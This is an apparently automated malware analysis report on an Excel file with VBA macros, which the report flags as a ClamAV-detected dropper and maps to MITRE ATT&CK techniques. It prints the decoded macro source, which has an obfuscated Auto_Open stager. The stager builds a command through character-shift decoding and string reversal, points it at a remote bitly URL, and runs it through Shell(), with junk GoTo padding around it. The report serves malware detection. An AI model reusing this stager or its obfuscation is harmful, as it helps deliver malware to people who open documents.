MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The file is an Excel document containing VBA macros, with a critical heuristic firing for an Auto_Open macro that uses the Shell() function. This function is further obfuscated using character-shift decoding, indicating an attempt to hide the execution of a command. The ClamAV detection name 'Doc.Dropper.Agent-6910166-0' strongly suggests this macro is designed to drop and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6910166-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6910166-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELLVBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17710 bytes |
SHA-256: d5170aa61658ed3d2670d7fed068054ae2ed09f3f5527fc0aeeca6401716f39a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub jhjgfdghj()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub Auto_Open()
l_Sp6 = "Mean7777"
l_Sp2 = DS4737L2A(StrReverse(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("# ", "zFBntnHxQ")))), StrReverse(StrReverse(Zq5rj2dk0(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj(" n", "ztaktS6li")))))))
l_Sp0 = DS4737L2A(StrReverse(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj(" k", "rZL3XX5Gy")))), StrReverse(StrReverse(Zq5rj2dk0(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj(" n", "ztaktS6li")))))))
l_Sp4 = "a h"
l_Sp1 = DS4737L2A(StrReverse(StrReverse(Zq5rj2dk0(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("÷¹", "rWdbNCEIZ")))))), StrReverse(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("Cè", "N02c9n5JE")))))
l_Sp5 = "ttp://www.bitly.com/"
l_Sp3 = DS4737L2A(StrReverse(StrReverse(Zq5rj2dk0(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("÷¹", "rWdbNCEIZ")))))), StrReverse(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("k›", "tyoYoi3BV")))))
l_Sp = l_Sp0 + l_Sp1 + l_Sp2 + l_Sp3 + l_Sp4 + l_Sp5 + l_Sp6
Shell (l_Sp)
End Sub
Public Function DS4737L2A(w1qbbJ7Oq As String, jQUuRcNnU As Integer)
Dim x2pFv756Z As Integer
For x2pFv756Z = 1 To Len(w1qbbJ7Oq)
If 343582335 = 343582335 + 1 Then End
Dim uPrvKHpDccEMZBUAYp As Date
GoTo gEceLRkshOJJINwFMc
gEceLRkshOJJINwFMc:
GoTo sEhAgDViVTNgzjuzwHZavw:
ikcBeItpdyftDmmZLmIVkQiZymkewtPmKQMYbqLMQg:
GoTo ETnHaUJqyzCnhoRfeuyBsRhaJtOrvJToCpcCZY
uzwHZavwFeKokqJRHnijhmQPYBdNikcBeItpdy:
RSQVGNUlLLcRTLlNsqYM = "YOcVUII"
GoTo eKoDkqJRHnijhmQPBdNeikcBeItpdyoftDmmLmIVkQiUZymkewtPmKQM
AgDViVTNgdzuzwHZavwFeKokqJRHnijhmQPYBdN:
Mid(w1qbbJ7Oq, x2pFv756Z, 1) = Chr(Asc(Mid(w1qbbJ7Oq, x2pFv756Z, 1)) - jQUuRcNnU)
GoTo ikcBeItpdyftDmmZLmIVkQiZymkewtPmKQMYbqLMQg
ETnHaUJqyzCnhoRfeuyBsRhaJtOrvJToCpcCZY:
kQiUZymkewtPmKQMYbqL = "QgbETnHaJqyzxCnhoR"
GoTo izlpOpAuMJgCbSOsGcPZwrUQD
bqLMQgbETnHaUJqyzxCnoRfeuyBsRhartOrvJToCpcCZYAiz:
QkPnFfFQKdMjSejg = "IQfgpHlnTatBr"
GoTo pOpAuMJgCbSOsGcPZwrUQD
MjSejgrIQfpNHlnTatBrQSQVGNUlLLcRTLlNsqYMYOcnVUIIksE:
kQiUZymkewtPmKQMYbqL = "QgbETnHaJqyzxCnhoR"
GoTo AgDViVTNgdzuzwHZavwFeKokqJRHnijhmQPYBdN
sEhAgDViVTNgzjuzwHZavw:
RSQVGNUlLLcRTLlNsqYM = "YOcVUII"
GoTo bqLMQgbETnHaUJqyzxCnoRfeuyBsRhartOrvJToCpcCZYAiz
dlbGPPNSqxEjvvKORJixaHKfHLaVFSssToQkPnFfFQKMjSejgrIQf:
ObsGcPZwrUQDYdlbGPPN = "qxEjvvKORixqaHKfHaVFSssTc"
GoTo pNHlnTatBrQSQVGNUlLLcRTLlNsqYMYOcnVUIIksEAgDViVTNgdz
pNHlnTatBrQSQVGNUlLLcRTLlNsqYMYOcnVUIIksEAgDViVTNgdz:
QkPnFfFQKdMjSejg = "IQfgpHlnTatBr"
GoTo uzwHZavwFeKokqJRHnijhmQPYBdNikcBeItpdy
dlbGPPNSqxEjvvKORJixaHKfHLaVFSssToQkPnFfFQK:
euyBsRhaJrtOrvJ = "oCpcCZYAizpOpuMJgCb"
GoTo MjSejgrIQfpNHlnTatBrQSQVGNUlLLcRTLlNsqYMYOcnVUIIksE
izlpOpAuMJgCbSOsGcPZwrUQD:
euyBsRhaJrtOrvJ = "oCpcCZYAizpOpuMJgCb"
GoTo dlbGPPNSqxEjvvKORJixaHKfHLaVFSssToQkPnFfFQKMjSejgrIQf
pOpAuMJgCbSOsGcPZwrUQD:
ObsGcPZwrUQDYdlbGPPN = "qxEjvvKORixqaHKfHaVFSssTc"
GoTo dlbGPPNSqxEjvvKORJixaHKfHLaVFSssToQkPnFfFQK
eKoDkqJRHnijhmQPBdNeikcBeItpdyoftDmmLmIVkQiUZymkewtPmKQ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.